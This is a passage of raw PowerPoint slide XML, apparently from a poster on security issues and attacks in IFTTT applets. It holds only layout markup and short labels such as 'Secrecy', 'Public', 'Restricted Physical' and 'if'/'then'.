      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="TextBox 171">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB079BB8-B635-475E-B9BF-5806A1710002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="29287694" y="8552331"/>
            <a:ext cx="1515035" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Restricted </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Physical</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="TextBox 172">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B4F2EFC-81B0-4CFD-A6D8-B3F6495FC727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="30426210" y="10248743"/>
            <a:ext cx="1120589" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="177" name="Straight Arrow Connector 176">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2122B6DA-6B45-47CC-91C5-C56615F2E452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="164" idx="0"/>
            <a:endCxn id="163" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="27602326" y="11480744"/>
            <a:ext cx="8967" cy="71125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7B3870A0-2A60-45B1-9CE9-7DD1AE1C862F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="163" idx="0"/>
            <a:endCxn id="159" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="27602326" y="10006684"/>
            <a:ext cx="838200" cy="858507"/>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CCC3ABD8-B2F8-471A-B551-D23737F1BEDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="163" idx="0"/>
            <a:endCxn id="160" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="26540011" y="10028499"/>
            <a:ext cx="1062315" cy="836692"/>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5CA30C0A-476C-46B4-B9D7-E8AC2CB83C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="160" idx="0"/>
            <a:endCxn id="158" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="26540011" y="8563366"/>
            <a:ext cx="887503" cy="84958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31889911-CE55-4159-875F-862B93211F64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="159" idx="0"/>
            <a:endCxn id="158" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="27427514" y="8563366"/>
            <a:ext cx="1013012" cy="858543"/>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DF8C17F1-9452-4824-A50D-62DBFE696A05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="151" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="27539572" y="7569483"/>
            <a:ext cx="0" cy="444963"/>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1269412-7DB5-4C48-A97F-0F02986FFF92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="168" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="28158140" y="6252519"/>
            <a:ext cx="198072" cy="952923"/>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C94C6238-9298-457B-A317-BCC229557EE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="243" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="29841264" y="6262529"/>
            <a:ext cx="441512" cy="971989"/>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C5F978BE-81B1-4282-A2D5-F8B7967D0CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="173" idx="0"/>
            <a:endCxn id="171" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="30986505" y="9110212"/>
            <a:ext cx="883024" cy="113853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CDD670F-D7E5-4ECE-A28F-E52A494464F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="173" idx="0"/>
            <a:endCxn id="172" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="30045212" y="9137106"/>
            <a:ext cx="941293" cy="1111637"/>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4BBA4E2-9956-40FC-9649-173D96E85D0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="172" idx="0"/>
            <a:endCxn id="170" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="30045212" y="7626866"/>
            <a:ext cx="865093" cy="925465"/>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510CC72B-1420-4771-97BC-5C0676AD0AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="171" idx="0"/>
            <a:endCxn id="170" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="30910305" y="7626866"/>
            <a:ext cx="959224" cy="89857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3D21E1BF-11A7-4CD4-BDB4-0B4D2620D370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="29153223" y="5898781"/>
            <a:ext cx="1376081" cy="36374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Secrecy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B32EE7E-A49C-45DA-AB17-05AD50C36FB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16566776" y="1613647"/>
            <a:ext cx="7827264" cy="649224"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D16D63"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>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C234B"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacks in IFTTT applets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D8215A1-618F-42E2-954B-88F4A75B7CCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8444752" y="6284681"/>
            <a:ext cx="7827264" cy="649224"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D16D63"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>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C234B"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C234B"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="314" name="Picture 313" descr="A close up of a sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7EB45F-D1E4-4345-A8F9-89B2EE3FE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9831" y="8716459"/>
            <a:ext cx="1195753" cy="1195753"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="316" name="Straight Arrow Connector 315">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36AC33BB-94F3-4217-84F4-5EB55E5EDB18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10950338" y="10323199"/>
            <a:ext cx="0" cy="990879"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="98425" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="TextBox 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99ADDBA-7B1C-4E44-ACEC-DB6D853E87D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9487627" y="9590275"/>
            <a:ext cx="1355321" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>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if</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="TextBox 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32ED8074-CD3B-4BA1-9D6E-F5119E05CE86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11493783" y="9594974"/>
            <a:ext cx="1540905" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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then</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="325" name="Picture 324">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7819A409-DFF0-487D-AFA4-2864BCE4BE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6854" y="11319060"/>
            <a:ext cx="1573438" cy="1294280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC83248-508F-467E-8112-44DB1F5FFFE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="188259" y="1640541"/>
            <a:ext cx="7826188" cy="645459"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D16D63"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>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C234B"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="327" name="Picture 326">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{943A7EBF-BC09-417C-A7BE-80BB0ABE7E7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13270067" y="11159028"/>
            <a:ext cx="1333433" cy="1624161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="328" name="Straight Arrow Connector 327">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EF861CA-6854-48D3-8740-DCA981D1D172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="327" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13936784" y="9950824"/>
            <a:ext cx="0" cy="1208204"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="98425" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Multiplication Sign 330">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ACD010A-09FA-44EE-B5BB-5852FBD5EA84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13500841" y="10488706"/>
            <a:ext cx="887506" cy="29583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3" name="Picture 332" descr="A close up of a sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98BB33D9-3411-4A5A-AF04-A9416D3D3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3905" y="3301778"/>
            <a:ext cx="999907" cy="999907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="TextBox 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9AA1D87-E56A-4AE9-91B1-03DF1F6CF056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10204803" y="3960441"/>
            <a:ext cx="1355321" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>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if</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="TextBox 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C8916ED-10C9-4684-BAE2-F42230461235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12479901" y="3911351"/>
            <a:ext cx="1540905" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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then</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="340" name="Picture 339">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02236F2-AA7B-4815-ADB4-C6C473F54296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14094826" y="5205724"/>
            <a:ext cx="804515" cy="979923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="349" name="Straight Arrow Connector 348">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D20641A7-C547-4869-B2FB-75D41762E8F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="333" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14533859" y="4301685"/>
            <a:ext cx="0" cy="754409"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="98425" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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44819D37-BEA6-4999-BE76-43687DADF001}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12142381" y="3818966"/>
            <a:ext cx="1788772" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="0C234B"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="TextBox 358">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F4A71B-AEA2-4EBE-B45E-9EFEB328EC39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8422686" y="8767483"/>
            <a:ext cx="4432702" cy="34962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t>Users Explicitly Grant the app access </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="TextBox 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2554DFA6-3604-41E1-9450-08DEECF793EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16551813" y="12647244"/>
            <a:ext cx="1355321" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>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if</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="TextBox 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EE9505-AA56-43EC-B899-FD5C133CCF1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18557969" y="12651943"/>
            <a:ext cx="1540905" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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then</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="371" name="Straight Arrow Connector 370">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85A23FF-92F9-4C33-A3F2-A3671C29000E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
